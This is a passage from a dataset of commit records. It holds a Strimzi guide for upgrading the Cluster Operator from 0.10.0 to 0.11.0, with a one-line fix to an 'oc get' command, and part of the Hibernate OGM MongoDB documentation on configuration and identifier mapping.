(#1410)\n\n","repos":"ppatierno\/kaas,scholzj\/barnabas,ppatierno\/kaas,scholzj\/barnabas","old_file":"documentation\/book\/proc-upgrading-the-cluster-operator-0-10-0-to-0-11-0.adoc","new_file":"documentation\/book\/proc-upgrading-the-cluster-operator-0-10-0-to-0-11-0.adoc","new_contents":"\/\/ This module is included in the following assemblies:\n\/\/\n\/\/ assembly-upgrade.adoc\n\n[id='proc-upgrading-the-cluster-operator-0-10-0-to-0-11-0-{context}']\n= Upgrading the Cluster Operator from 0.10.0 to 0.11.0\n\nThis procedure will describe how to upgrade a Cluster Operator deployment from version 0.10.0 to version 0.11.0.\nThe availability of Kafka clusters managed by the Cluster Operator is not affected by the upgrade operation.\n\n.Prerequisites \n\n* An existing version 0.10.0 Cluster Operator deployment to be upgraded.\n\n.Procedure\n\n. Backup the existing Cluster Operator resources.\n+\nifdef::Kubernetes[]\nOn {KubernetesName} use `kubectl get`:\n+\n----\nkubectl get all -l app=strimzi -o yaml > strimzi-backup.yaml\n----\n+\nendif::Kubernetes[]\nOn {OpenShiftName} use `oc get`:\n+\n----\noc get all -l app=strimzi -o yaml > strimzi-backup.yaml\n----\n\n. Update the Cluster Operator. \nYou will need to modify the installation files according to the namespace the Cluster Operator is running in.\n+\ninclude::frag-cluster-operator-namespace-sed.adoc[]\n+\nIf you modified one or more environment variables in your existing Cluster Operator `Deployment`, edit\n`install\/cluster-operator\/050-Deployment-cluster-operator.yaml` to reflect the changes that you made.\n\n. When you have an updated configuration you can deploy it along with the rest of the install resources.\n+\nifdef::Kubernetes[]\nOn {KubernetesName} use `kubectl apply`:\n+\n----\nkubectl apply -f install\/cluster-operator\n----\n+\nendif::Kubernetes[]\nOn {OpenShiftName} use `oc apply`:\n+\n----\noc apply -f install\/cluster-operator\n----\n+\nWait for the associated rolling updates to complete.\n\n. Update existing resources to cope with deprecated custom resource properties.\n+\n* If you have `Kafka` resources that specify `Kafka.spec.topicOperator`, rewrite them to use `Kafka.spec.entityOperator.topicOperator` instead.\n","old_contents":"\/\/ This module is included in the following assemblies:\n\/\/\n\/\/ assembly-upgrade.adoc\n\n[id='proc-upgrading-the-cluster-operator-0-10-0-to-0-11-0-{context}']\n= Upgrading the Cluster Operator from 0.10.0 to 0.11.0\n\nThis procedure will describe how to upgrade a Cluster Operator deployment from version 0.10.0 to version 0.11.0.\nThe availability of Kafka clusters managed by the Cluster Operator is not affected by the upgrade operation.\n\n.Prerequisites \n\n* An existing version 0.10.0 Cluster Operator deployment to be upgraded.\n\n.Procedure\n\n. Backup the existing Cluster Operator resources.\n+\nifdef::Kubernetes[]\nOn {KubernetesName} use `kubectl get`:\n+\n----\nkubectl get all -l app=strimzi -o yaml > strimzi-backup.yaml\n----\n+\nendif::Kubernetes[]\nOn {OpenShiftName} use `oc get`:\n+\n----\noc get -l all app=strimzi -o yaml > strimzi-backup.yaml\n----\n\n. Update the Cluster Operator. \nYou will need to modify the installation files according to the namespace the Cluster Operator is running in.\n+\ninclude::frag-cluster-operator-namespace-sed.adoc[]\n+\nIf you modified one or more environment variables in your existing Cluster Operator `Deployment`, edit\n`install\/cluster-operator\/050-Deployment-cluster-operator.yaml` to reflect the changes that you made.\n\n. When you have an updated configuration you can deploy it along with the rest of the install resources.\n+\nifdef::Kubernetes[]\nOn {KubernetesName} use `kubectl apply`:\n+\n----\nkubectl apply -f install\/cluster-operator\n----\n+\nendif::Kubernetes[]\nOn {OpenShiftName} use `oc apply`:\n+\n----\noc apply -f install\/cluster-operator\n----\n+\nWait for the associated rolling updates to complete.\n\n. Update existing resources to cope with deprecated custom resource properties.\n+\n* If you have `Kafka` resources that specify `Kafka.spec.topicOperator`, rewrite them to use `Kafka.spec.entityOperator.topicOperator` instead.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a26679da20148e77f2d391392d7dc1f566c263a0","subject":"OGM-1326 Add example of associations between entities of the same class (#25)","message":"OGM-1326 Add example of associations between entities of the same class (#25)\n\nAdded an example to the documentation that shows a OneToOne mapping to the same entity. ie. A person has a spouse that is another person.","repos":"Sanne\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,DavideD\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,hibernate\/hibernate-ogm","old_file":"documentation\/manual\/src\/main\/asciidoc\/modules\/mongodb.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/modules\/mongodb.asciidoc","new_contents":"[[ogm-mongodb]]\n\n== MongoDB\n\nhttp:\/\/www.mongodb.org[MongoDB] is a document oriented datastore\nwritten in C++ with strong emphasis on ease of use.\nThe nested nature of documents make it a particularly natural fit for most object representations.\n\nThis implementation is based upon the MongoDB Java driver.\nThe currently supported version is {mongodb-version}.\n\n=== Why should I use Hibernate OGM with MongoDB\n\nIt is possible that in your project you have some entities that might benefit from MongoDB\ndynamic schema, but having a schema makes it possible to obtain better performance because\nthe datastore can use the information of the schema to apply some optimizations that\nwouldn't be otherwise possible.\n\nJPA already has ways to define constraints and indexes and via Hibernate OGM you can\nuse the same annotations for both your relational and not relational needs.\n\nHibernate OGM cannot make MongoDB transactional but by using the JPA transaction demarcation\nmechanism it can group the operations and flush them to the datastore to\nminimize the number of requests.\n\nAnother benefit of using Hibernate OGM with MongoDB is that it will also make it possible\nto use Hibernate Search out of the box. Hibernate Search brings the power of Lucene\nto your project, giving you the ability to run fast google-like searches.\n\nThis means that you can query the datastore using:\n\n* JPQL queries (see <<ogm-jpql-query>>)\n* MongoDB native queries (see <<ogm-mongodb-queries-native>>)\n* Full-text queries (see <<ogm-query-using-hibernate-search>>)\n\nOne of Hibernate OGM main goal is to map entities in a \"natural\" way, this means that your\ndatastore will still be accessible in case you need to use other tools or want to run\nnative queries occasionally.\n\n=== Configuring MongoDB\n\nConfiguring Hibernate OGM to use MongoDb is easy:\n\n* Add the MongoDB module and driver to the classpath\n* provide the MongoDB URL to Hibernate OGM\n\n==== Adding MongoDB dependencies\n\nTo add the dependencies via Maven, add the following module:\n\n[source, XML]\n[subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.hibernate.ogm<\/groupId>\n <artifactId>hibernate-ogm-mongodb<\/artifactId>\n <version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\nThis will pull the MongoDB driver transparently.\n\nIf you're not using a dependency management tool,\ncopy all the dependencies from the distribution in the directories:\n\n* `\/lib\/required`\n* `\/lib\/mongodb`\n* Optionally - depending on your container - you might need some of the jars from `\/lib\/provided`\n\nMongoDB does not require Hibernate Search for the execution of JPQL or HQL queries.\n\n==== MongoDB specific configuration properties\n\nTo get started quickly, pay attention to the following options:\n\n* `hibernate.ogm.datastore.provider`\n* `hibernate.ogm.datastore.host`\n* `hibernate.ogm.datastore.database`\n\nAnd we should have you running.\nThe following properties are available to configure MongoDB support:\n\n.MongoDB datastore configuration properties\nhibernate.ogm.datastore.provider::\nTo use MongoDB as a datastore provider, this property must be set to `mongodb`\nhibernate.ogm.option.configurator::\nThe fully-qualified class name or an instance of a programmatic option configurator (see <<ogm-mongodb-programmatic-configuration>>)\nhibernate.ogm.datastore.host::\nThe hostname and port of the MongoDB instance.\nThe optional port is concatenated to the host and separated by a colon.\nWhen using replica sets, you can define the various servers in a comma separated list of hosts and ports.\nLet's see a few valid examples:\n\n* `mongodb.example.com`\n* `mongodb.example.com:27018`\n* `2001:db8::ff00:42:8329` (IPv6)\n\n* `[2001:db8::ff00:42:8329]:27018` (IPv6 with port requires the IPv6 to be surrounded by square brackets)\n* `www.example.com, www2.example.com:123, 192.0.2.1, 192.0.2.2:123, 2001:db8::ff00:42:8329, [2001:db8::ff00:42:8329]:123` (replica set)\n+\nThe default value is `127.0.0.1:27017`. If left undefined, the default port is `27017`.\nhibernate.ogm.datastore.port::\nDeprecated: use `hibernate.ogm.datastore.host`.\nThe port used by the MongoDB instance.\nIgnored when multiple hosts are defined.\nThe default value is `27017`.\nhibernate.ogm.datastore.database::\nThe database to connect to. This property has no default value.\nhibernate.ogm.datastore.create_database::\nIf set to true, the database will be created if it doesn't exist.\nThis property default value is false.\nhibernate.ogm.datastore.username::\nThe username used when connecting to the MongoDB server.\nThis property has no default value.\nhibernate.ogm.datastore.password::\nThe password used to connect to the MongoDB server.\nThis property has no default value.\nThis property is ignored if the username isn't specified.\nhibernate.ogm.error_handler::\nThe fully-qualified class name, class object or an instance of `ErrorHandler` to get notified upon errors during flushes (see <<ogm-api-error-handler>>)\nhibernate.ogm.mongodb.driver.*::\nDefines a prefix for all options which should be passed through to the MongoDB driver.\nFor available options refer to the JavaDocs of link:http:\/\/api.mongodb.org\/java\/3.0\/com\/mongodb\/MongoClientOptions.Builder.html[MongoClientOptions.Builder]. All `String`, `int` and `boolean` properties\ncan be set, eg `hibernate.ogm.mongodb.driver.serverSelectionTimeout`.\nhibernate.ogm.mongodb.authentication_database::\nDefines the name of the authentication database, default value is _admin_.\nhibernate.ogm.mongodb.authentication_mechanism::\nDefines the authentication mechanism to use. Possible values are:\n\n* `BEST`: Handshakes with the server to find the best authentication mechanism.\n* `SCRAM_SHA_1`: The SCRAM SHA 1 Challenge Response mechanism as described in this link:http:\/\/tools.ietf.org\/html\/rfc5802[RFC].\n* `MONGODB_CR`: The MongoDB Challenge Response mechanism (deprecated since MongoDB 3)\n* `GSSAPI`: The GSSAPI mechanism. See the http:\/\/tools.ietf.org\/html\/rfc4752[RFC]\n* `MONGODB_X509`: The MongoDB X.509\n* `PLAIN`: The PLAIN mechanism. See the http:\/\/www.ietf.org\/rfc\/rfc4616.txt[RFC]\nhibernate.ogm.datastore.document.association_storage::\nDefines the way OGM stores association information in MongoDB.\nThe following two strategies exist (values of the `org.hibernate.ogm.datastore.document.options.AssociationStorageType` enum):\n\n* `IN_ENTITY`: store association information within the entity\n* `ASSOCIATION_DOCUMENT`: store association information in a dedicated document per association\n\n+\n`IN_ENTITY` is the default and recommended option\nunless the association navigation data is much bigger than the core of the document and leads to performance degradation.\nhibernate.ogm.mongodb.association_document_storage::\nDefines how to store assocation documents (applies only if the `ASSOCIATION_DOCUMENT`\nassociation storage strategy is used).\nPossible strategies are (values of the `org.hibernate.ogm.datastore.mongodb.options.AssociationDocumentStorageType` enum):\n\n* `GLOBAL_COLLECTION` (default): stores the association information in a unique MongoDB collection for all associations\n* `COLLECTION_PER_ASSOCIATION` stores the association in a dedicated MongoDB collection per association\n\nhibernate.ogm.datastore.document.map_storage::\nDefines the way OGM stores the contents of map-typed associations in MongoDB.\nThe following two strategies exist (values of the `org.hibernate.ogm.datastore.document.options.MapStorageType` enum):\n\n* `BY_KEY`: map-typed associations with a single key column which is of type `String` will be stored as a sub-document,\norganized by the given key; Not applicable for other types of key columns, in which case always `AS_LIST` will be used\n* `AS_LIST`: map-typed associations will be stored as an array containing a sub-document for each map entry.\nAll key and value columns will be contained within the array elements\n\nhibernate.ogm.mongodb.write_concern::\nDefines the write concern setting to be applied when issuing writes against the MongoDB datastore.\nPossible settings are (values of the `WriteConcernType` enum):\n`ACKNOWLEDGED`, `UNACKNOWLEDGED`, `FSYNCED`, `JOURNALED`, `REPLICA_ACKNOWLEDGED`, `MAJORITY` and `CUSTOM`.\nWhen set to `CUSTOM`, a custom `WriteConcern` implementation type has to be specified.\n+\nThis option is case insensitive and the default value is `ACKNOWLEDGED`.\nhibernate.ogm.mongodb.write_concern_type::\nSpecifies a custom `WriteConcern` implementation type (fully-qualified name, class object or instance).\nThis is useful in cases where the pre-defined configurations are not sufficient,\ne.g. if you want to ensure that writes are propagated to a specific number of replicas or given \"tag set\".\nOnly takes effect if `hibernate.ogm.mongodb.write_concern` is set to `CUSTOM`.\nhibernate.ogm.mongodb.read_preference::\nSpecifies the `ReadPreference` to be applied when issuing reads against the MongoDB datastore.\nPossible settings are (values of the `ReadPreferenceType` enum):\n`PRIMARY`, `PRIMARY_PREFERRED`, `SECONDARY`, `SECONDARY_PREFERRED` and `NEAREST`.\nIt's currently not possible to plug in custom read preference types.\nIf you're interested in such a feature, please let us know.\n\nFor more information, please refer to the\nhttp:\/\/api.mongodb.org\/java\/current\/com\/mongodb\/WriteConcern.html[official documentation].\n\n[NOTE]\n====\nWhen bootstrapping a session factory or entity manager factory programmatically,\nyou should use the constants accessible via `org.hibernate.ogm.datastore.mongodb.MongoDBProperties`\nwhen specifying the configuration properties listed above.\n\nCommon properties shared between stores are declared on `OgmProperties`\n(a super interface of `MongoDBProperties`).\n\nFor maximum portability between stores, use the most generic interface possible.\n====\n\n[[ogm-mongodb-annotation-configuration]]\n==== Annotation based configuration\n\nHibernate OGM allows to configure store-specific options via Java annotations.\nYou can override global configurations for a specific entity or even a specify property\nby virtue of the location where you place that annotation.\n\nWhen working with the MongoDB backend, you can specify the following settings:\n\n* the write concern for entities and associations using the `@WriteConcern` annotation\n* the read preference for entities and associations using the `@ReadPreference` annotation\n* a strategy for storing associations using the `@AssociationStorage` and `@AssociationDocumentStorage` annotations\n* a strategy for storing the contents of map-typed associations using the `@MapStorage` annotation\n\nRefer to <<mongodb-associations> to learn more about the options related to storing associations.\n\nThe following shows an example:\n\n.Configuring the association storage strategy using annotations\n====\n[source, JAVA]\n----\n@Entity\n@WriteConcern(WriteConcernType.JOURNALED)\n@ReadPreference(ReadPreferenceType.PRIMARY_PREFERRED)\n@AssociationStorage(AssociationStorageType.ASSOCIATION_DOCUMENT)\n@AssociationDocumentStorage(AssociationDocumentStorageType.COLLECTION_PER_ASSOCIATION)\n@MapStorage(MapStorageType.AS_LIST)\npublic class Zoo {\n\n @OneToMany\n private Set<Animal> animals;\n\n @OneToMany\n private Set<Person> employees;\n\n @OneToMany\n @AssociationStorage(AssociationStorageType.IN_ENTITY)\n private Set<Person> visitors;\n\n \/\/ getters, setters ...\n}\n----\n====\n\nThe `@WriteConcern` annotation on the entity level expresses that all writes should be done using the `JOURNALED` setting.\nSimilarly, the `@ReadPreference` annotation advices the engine to preferably read that entity from the primary node if possible.\nThe other two annotations on the type-level specify that all associations of the `Zoo`\nclass should be stored in separate assocation documents, using a dedicated collection per association.\nThis setting applies to the `animals` and `employees` associations.\nOnly the elements of the `visitors` association will be stored in the document of the corresponding `Zoo` entity\nas per the configuration of that specific property which takes precedence over the entity-level configuration.\n\n[[ogm-mongodb-programmatic-configuration]]\n==== Programmatic configuration\n\nIn addition to the annotation mechanism,\nHibernate OGM also provides a programmatic API for applying store-specific configuration options.\nThis can be useful if you can't modify certain entity types or\ndon't want to add store-specific configuration annotations to them.\nThe API allows set options in a type-safe fashion on the global, entity and property levels.\n\nWhen working with MongoDB, you can currently configure the following options using the API:\n\n* write concern\n* read preference\n* association storage strategy\n* association document storage strategy\n* strategy for storing the contents of map-typed associations\n\nTo set these options via the API, you need to create an `OptionConfigurator` implementation\nas shown in the following example:\n\n.Example of an option configurator\n====\n[source, JAVA]\n----\npublic class MyOptionConfigurator extends OptionConfigurator {\n\n @Override\n public void configure(Configurable configurable) {\n configurable.configureOptionsFor( MongoDB.class )\n .writeConcern( WriteConcernType.REPLICA_ACKNOWLEDGED )\n .readPreference( ReadPreferenceType.NEAREST )\n .entity( Zoo.class )\n .associationStorage( AssociationStorageType.ASSOCIATION_DOCUMENT )\n .associationDocumentStorage( AssociationDocumentStorageType.COLLECTION_PER_ASSOCIATION )\n .mapStorage( MapStorageType.ASLIST )\n .property( \"animals\", ElementType.FIELD )\n .associationStorage( AssociationStorageType.IN_ENTITY )\n .entity( Animal.class )\n .writeConcern( new RequiringReplicaCountOf( 3 ) )\n .associationStorage( AssociationStorageType.ASSOCIATION_DOCUMENT );\n }\n}\n----\n====\n\nThe call to `configureOptionsFor()`, passing the store-specific identifier type `MongoDB`,\nprovides the entry point into the API. Following the fluent API pattern, you then can configure\nglobal options (`writeConcern()`, `readPreference()`) and navigate to single entities or properties to apply options\nspecific to these (`associationStorage()` etc.).\nThe call to `writeConcern()` for the `Animal` entity shows how a specific write concern type can be used.\nHere `RequiringReplicaCountOf` is a custom implementation of `WriteConcern` which ensures\nthat writes are propagated to a given number of replicas before a write is acknowledged.\n\nOptions given on the property level precede entity-level options. So e.g. the `animals` association of the `Zoo`\nclass would be stored using the in entity strategy, while all other associations of the `Zoo` entity would\nbe stored using separate association documents.\n\nSimilarly, entity-level options take precedence over options given on the global level.\nGlobal-level options specified via the API complement the settings given via configuration properties.\nIn case a setting is given via a configuration property and the API at the same time,\nthe latter takes precedence.\n\nNote that for a given level (property, entity, global),\nan option set via annotations is overridden by the same option set programmatically.\nThis allows you to change settings in a more flexible way if required.\n\nTo register an option configurator, specify its class name using the `hibernate.ogm.option.configurator` property.\nWhen bootstrapping a session factory or entity manager factory programmatically,\nyou also can pass in an `OptionConfigurator` instance or the class object representing the configurator type.\n\n\n[[ogm-mongodb-storage-principles]]\n=== Storage principles\n\nHibernate OGM tries to make the mapping to the underlying datastore as natural as possible\nso that third party applications not using Hibernate OGM can still read\nand update the same datastore.\nWe worked particularly hard on the MongoDB model\nto offer various classic mappings between your object model\nand the MongoDB documents.\n\nTo describe things simply, each entity is stored as a MongoDB document.\nThis document is stored in a MongoDB collection named after the entity type.\nThe navigational information for each association from one entity to (a set of) entity\nis stored in the document representing the entity we are departing from.\n\n[[mongodb-built-in-types]]\n==== Properties and built-in types\n\nEach entity is represented by a document.\nEach property or more precisely column is represented by a field in this document,\nthe field name being the column name.\n\nHibernate OGM supports by default the following property types:\n\n* `java.lang.String`\n\n[source, JSON]\n----\n { \"text\" : \"Hello world!\" }\n----\n\n* `java.lang.Character` (or char primitive)\n\n[source, JSON]\n----\n { \"delimiter\" : \"\/\" }\n----\n\n* `java.lang.Boolean` (or boolean primitive)\n\n[source, JSON]\n----\n { \"favorite\" : true } # default mapping\n { \"favorite\" : \"T\" } # if @Type(type = \"true_false\") is given\n { \"favorite\" : \"Y\" } # if @Type(type = \"yes_no\") is given\n { \"favorite\" : 1 } # if @Type(type = \"numeric_boolean\") is given\n----\n\n* `java.lang.Byte` (or byte primitive)\n\n[source, JSON]\n----\n { \"display_mask\" : \"70\" }\n----\n\n* `java.lang.Byte[]` (or byte[])\n\n[source, JSON]\n----\n { \"pdfAsBytes\" : BinData(0,\"MTIzNDU=\") }\n----\n\n* `java.lang.Short` (or short primitive)\n\n[source, JSON]\n----\n { \"urlPort\" : 80 }\n----\n\n* `java.lang.Integer` (or integer primitive)\n\n[source, JSON]\n----\n { \"stockCount\" : 12309 }\n----\n\n* `java.lang.Long` (or long primitive)\n\n[source, JSON]\n----\n { \"userId\" : NumberLong(\"-6718902786625749549\") }\n----\n\n* `java.lang.Float` (or float primitive)\n\n[source, JSON]\n----\n { \"visitRatio\" : 10.39 }\n----\n\n* `java.lang.Double` (or double primitive)\n\n[source, JSON]\n----\n { \"tax_percentage\" : 12.34 }\n----\n\n* `java.math.BigDecimal`\n\n[source, JSON]\n----\n { \"site_weight\" : \"21.77\" }\n----\n\n* `java.math.BigInteger`\n\n[source, JSON]\n----\n { \"site_weight\" : \"444\" }\n----\n\n* `java.util.Calendar`\n\n[source, JSON]\n----\n { \"creation\" : \"2014\/11\/03 16:19:49:283 +0000\" }\n----\n\n* `java.util.Date`\n\n[source, JSON]\n----\n { \"last_update\" : ISODate(\"2014-11-03T16:19:49.283Z\") }\n----\n\n* `java.util.UUID`\n\n[source, JSON]\n----\n { \"serialNumber\" : \"71f5713d-69c4-4b62-ad15-aed8ce8d10e0\" }\n----\n\n* `java.util.URL`\n\n[source, JSON]\n----\n { \"url\" : \"http:\/\/www.hibernate.org\/\" }\n----\n\n* `org.bson.types.ObjectId`\n\n[source, JSON]\n----\n { \"object_id\" : ObjectId(\"547d9b40e62048750f25ef77\") }\n----\n\n[NOTE]\n====\nHibernate OGM doesn't store null values in MongoDB,\nsetting a value to null is the same as removing the field\nin the corresponding object in the db.\n\nThis can have consequences when it comes to queries on null value.\n====\n\n==== Entities\n\nEntities are stored as MongoDB documents and not as BLOBs:\neach entity property will be translated into a document field.\nYou can use `@Table` and `@Column` annotations\nto rename respectively the collection the document is stored in\nand the document's field a property is persisted in.\n\n.Default JPA mapping for an entity\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n\/\/ Stored in the Collection \"News\"\n{\n \"_id\" : \"1234-5678-0123-4567\",\n \"title\": \"On the merits of NoSQL\",\n}\n----\n====\n\n.Rename field and collection using @Table and @Column\n====\n[source, JAVA]\n----\n@Entity\n\/\/ Overrides the collection name\n@Table(name = \"News_Collection\")\npublic class News {\n\n @Id\n private String id;\n\n \/\/ Overrides the field name\n @Column(name = \"headline\")\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n\/\/ Stored in the Collection \"News\"\n{\n \"_id\" : \"1234-5678-0123-4567\",\n \"headline\": \"On the merits of NoSQL\",\n}\n----\n====\n\n===== Identifiers\n\n[NOTE]\n====\nHibernate OGM always store identifiers using the `_id` field of a MongoDB document ignoring\nthe name of the property in the entity.\n\nThat's a good thing as MongoDB has special treatment and expectation of the property `_id`.\n====\n\nAn identifier type may be one of the <<mongodb-built-in-types,built-in types>>\nor a more complex type represented by an embedded class.\nWhen you use a built-in type, the identifier is mapped like a regular property.\nWhen you use an embedded class, then the `_id` is representing a nested document\ncontaining the embedded class properties.\n\n.Define an identifier as a primitive type\n====\n[source, JAVA]\n----\n@Entity\npublic class Bookmark {\n\n @Id\n private String id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"bookmark_1\"\n \"title\" : \"Hibernate OGM documentation\"\n}\n----\n====\n\n.Define an identifier using @EmbeddedId\n====\n[source, JAVA]\n----\n@Embeddable\npublic class NewsID implements Serializable {\n\n private String title;\n private String author;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class News {\n\n @EmbeddedId\n private NewsID newsId;\n private String content;\n\n \/\/ getters, setters ...\n}\n----\n\nNews collection as JSON in MongoDB\n\n[source, JSON]\n----\n\n{\n \"_id\" : {\n \"author\" : \"Guillaume\",\n \"title\" : \"How to use Hibernate OGM ?\"\n },\n \"content\" : \"Simple, just like ORM but with a NoSQL database\"\n}\n\n----\n====\n\nGenerally, it is recommended though to work with MongoDB's object id data type.\nThis will facilitate the integration with other applications expecting that common MongoDB id type.\nTo do so, you have two options:\n\n* Define your id property as `org.bson.types.ObjectId`\n* Define your id property as `String` and annotate it with `@Type(type=\"objectid\")`\n\nIn both cases the id will be stored as native `ObjectId` in the datastore.\n\n.Define an id as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private ObjectId id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n.Define an id of type String as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n @Type(type = \"objectid\")\n private String id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n===== Identifier generation strategies\n\nYou can assign id values yourself or let Hibernate OGM generate the value using the\n`@GeneratedValue` annotation.\n\nThere are 4 different strategies:\n\n1. <<mongodb-identity-id-generation-strategy, IDENTITY>> (suggested)\n2. <<mongodb-table-id-generation-strategy, TABLE>>\n3. <<mongodb-sequence-id-generation-strategy, SEQUENCE>>\n4. <<mongodb-auto-id-generation-strategy, AUTO>>\n\n[[mongodb-identity-id-generation-strategy]]\n*1) IDENTITY generation strategy*\n\nThe preferable strategy, Hibernate OGM will create the identifier upon insertion.\nTo apply this strategy the id must be one of the following:\n\n* annotated with `@Type(type=\"objectid\")`\n* `org.bson.types.ObjectId`\n\nlike in the following examples:\n\n.Define an id of type String as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n @GeneratedValue(strategy = GenerationType.IDENTITY)\n @Type(type = \"objectid\")\n private String id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : ObjectId(\"5425448830048b67064d40b1\"),\n \"title\" : \"Exciting News\"\n}\n----\n====\n\n.Define an id as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n @GeneratedValue(strategy = GenerationType.IDENTITY)\n private ObjectId id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : ObjectId(\"5425448830048b67064d40b1\"),\n \"title\" : \"Exciting News\"\n}\n----\n====\n\n[[mongodb-table-id-generation-strategy]]\n*2) TABLE generation strategy*\n\n.Id generation strategy TABLE using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE)\n private Long id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n\n----\n\nGuitarPlayer collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"name\" : \"Buck Cherry\"\n}\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"GuitarPlayer\",\n \"next_val\" : 101\n}\n----\n====\n\n.Id generation strategy TABLE using a custom table\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE, generator = \"guitarGen\")\n @TableGenerator(\n name = \"guitarGen\",\n table = \"GuitarPlayerSequence\",\n pkColumnValue = \"guitarPlayer\",\n valueColumnName = \"nextGuitarPlayerId\"\n )\n private long id;\n\n \/\/ getters, setters ...\n}\n\n----\n\nGuitarPlayer collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"name\" : \"Buck Cherry\"\n}\n----\n\nGuitarPlayerSequence collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"guitarPlayer\",\n \"nextGuitarPlayerId\" : 2\n}\n----\n====\n\n*3) SEQUENCE generation strategy*\n\n[[mongodb-sequence-id-generation-strategy]]\n.SEQUENCE id generation strategy using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class Song {\n\n @Id\n @GeneratedValue(strategy = GenerationType.SEQUENCE)\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\nSong collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(2),\n \"title\" : \"Flower Duet\"\n}\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{ \"_id\" : \"song_sequence_name\", \"next_val\" : 21 }\n----\n====\n\n[[mongodb-sequence-id-generation-strategy-custom]]\n.SEQUENCE id generation strategy using custom values\n====\n[source, JAVA]\n----\n@Entity\npublic class Song {\n\n @Id\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"songSequenceGenerator\")\n @SequenceGenerator(\n name = \"songSequenceGenerator\",\n sequenceName = \"song_seq\",\n initialValue = 2,\n allocationSize = 20\n )\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\nSong collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(2),\n \"title\" : \"Flower Duet\"\n}\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{ \"_id\" : \"song_seq\", \"next_val\" : 42 }\n----\n====\n\n[[mongodb-auto-id-generation-strategy]]\n*4) AUTO generation strategy*\n\n[WARNING]\n====\nCare must be taken when using the `GenerationType.AUTO` strategy.\nWhen the property `hibernate.id.new_generator_mappings` is set to `false` (default),\nit will map to the `IDENTITY` strategy.\nAs described before, this requires your ids to be of type `ObjectId` or `@Type(type = \"objectid\") String`.\nIf `hibernate.id.new_generator_mappings` is set to true, `AUTO` will be mapped to the `TABLE` strategy.\nThis requires your id to be of a numeric type.\n\nWe recommend to not use `AUTO` but one of the explicit strategies (`IDENTITY` or `TABLE`) to avoid\npotential misconfigurations.\n\nFor more details you can check the issue https:\/\/hibernate.atlassian.net\/browse\/OGM-663[OGM-663].\n====\n\nIf the property `hibernate.id.new_generator_mappings` is set to `false`,\n`AUTO` will behave as the `IDENTITY` strategy.\n\nIf the property `hibernate.id.new_generator_mappings` is set to `true`,\n`AUTO` will behave as the `SEQUENCE` strategy.\n\n.AUTO id generation strategy using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class DistributedRevisionControl {\n\n @Id\n @GeneratedValue(strategy = GenerationType.AUTO)\n private Long id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\nDistributedRevisionControl collection\n\n[source, JSON]\n----\n{ \"_id\" : NumberLong(1), \"name\" : \"Git\" }\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{ \"_id\" : \"hibernate_sequence\", \"next_val\" : 2 }\n----\n====\n\n.AUTO id generation strategy wih `hibernate.id.new_generator_mappings` set to false and ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class Comedian {\n\n @Id\n @GeneratedValue(strategy = GenerationType.AUTO)\n private ObjectId id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\nComedian collection\n\n[source, JSON]\n----\n{ \"_id\" : ObjectId(\"5458b11693f4add0f90519c5\"), \"name\" : \"Louis C.K.\" }\n----\n====\n\n.Entity with @EmbeddedId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @EmbeddedId\n private NewsID newsId;\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class NewsID implements Serializable {\n\n private String title;\n private String author;\n\n \/\/ getters, setters ...\n}\n----\n\nRendered as JSON in MongoDB\n[source, JSON]\n----\n{\n \"_id\" :{\n \"title\": \"How does Hibernate OGM MongoDB work?\",\n \"author\": \"Guillaume\"\n }\n}\n----\n====\n\n===== Embedded objects and collections\n\nHibernate OGM stores 